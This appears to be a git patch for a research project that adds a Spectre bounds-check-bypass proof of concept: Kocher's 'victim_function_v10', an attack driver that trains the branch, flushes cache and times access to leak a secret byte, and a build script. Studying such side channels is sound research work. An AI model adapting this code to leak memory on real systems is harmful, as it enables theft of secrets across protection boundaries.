From 5c5b6f718e0662e9226bcc55b96270082dffe91b Mon Sep 17 00:00:00 2001
From: Iru Cai <mytbk920423@gmail.com>
Date: Tue, 16 Apr 2019 22:31:31 +0800
Subject: victim function v10

---
 attack_code/victim_v10/attack_v10.c | 41 +++++++++++++++++++++++++++++++++++++
 attack_code/victim_v10/build.sh     |  1 +
 attack_code/victim_v10/victim_v10.c | 17 +++++++++++++++
 3 files changed, 59 insertions(+)
 create mode 100644 attack_code/victim_v10/attack_v10.c
 create mode 100755 attack_code/victim_v10/build.sh
 create mode 100644 attack_code/victim_v10/victim_v10.c

diff --git a/attack_code/victim_v10/attack_v10.c b/attack_code/victim_v10/attack_v10.c
new file mode 100644
index 000000000..1c1eecd45
--- /dev/null
+++ b/attack_code/victim_v10/attack_v10.c
@@ -0,0 +1,41 @@
+#include <stdio.h>
+#include <stdint.h>
+#include <string.h>
+#include <x86intrin.h>
+
+/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */
+#define LLC_SIZE (2 << 20)
+
+uint8_t dummy[LLC_SIZE];
+size_t array_size = 4;
+uint8_t array1[200] = {1, 2, 3, 4};
+uint8_t array2[256 * 64 * 2];
+uint8_t X;
+uint8_t temp = 1;
+
+void victim_function_v10(size_t x, uint8_t k);
+
+int main()
+{
+	victim_function_v10(0, 0);
+	victim_function_v10(0, 0);
+	victim_function_v10(0, 0);
+	victim_function_v10(0, 0);
+	victim_function_v10(0, 0);
+
+	memset(dummy, 1, sizeof(dummy)); // flush L2
+	X = 123; // set the secret value, and also bring it to cache
+
+	_mm_mfence();
+
+	size_t attack_idx = &X - array1;
+	victim_function_v10(attack_idx, 123);
+
+	unsigned int junk;
+	volatile uint8_t x;
+	unsigned long time1 = __rdtscp(&junk);
+	x ^= array2[0];
+	unsigned long time2 = __rdtscp(&junk);
+
+	printf("%d\n", time2 - time1);
+}
diff --git a/attack_code/victim_v10/build.sh b/attack_code/victim_v10/build.sh
new file mode 100755
index 000000000..07897b62d
--- /dev/null
+++ b/attack_code/victim_v10/build.sh
@@ -0,0 +1 @@
+gcc -O2 -o ../../attack_v10 attack_v10.c victim_v10.c -static
diff --git a/attack_code/victim_v10/victim_v10.c b/attack_code/victim_v10/victim_v10.c
new file mode 100644
index 000000000..193ac750d
--- /dev/null
+++ b/attack_code/victim_v10/victim_v10.c
@@ -0,0 +1,17 @@
+/* code from https://www.paulkocher.com/doc/MicrosoftCompilerSpectreMitigation.html */
+
+#include <stdlib.h>
+#include <stdint.h>
+
+extern size_t array_size;
+extern uint8_t array1[];
+extern uint8_t array2[];
+extern uint8_t temp;
+
+void victim_function_v10(size_t x, uint8_t k)
+{
+	if (x < array_size) {
+		if (array1[x] == k)
+			temp &= array2[0];
+	}
+}
-- 
cgit v1.2.3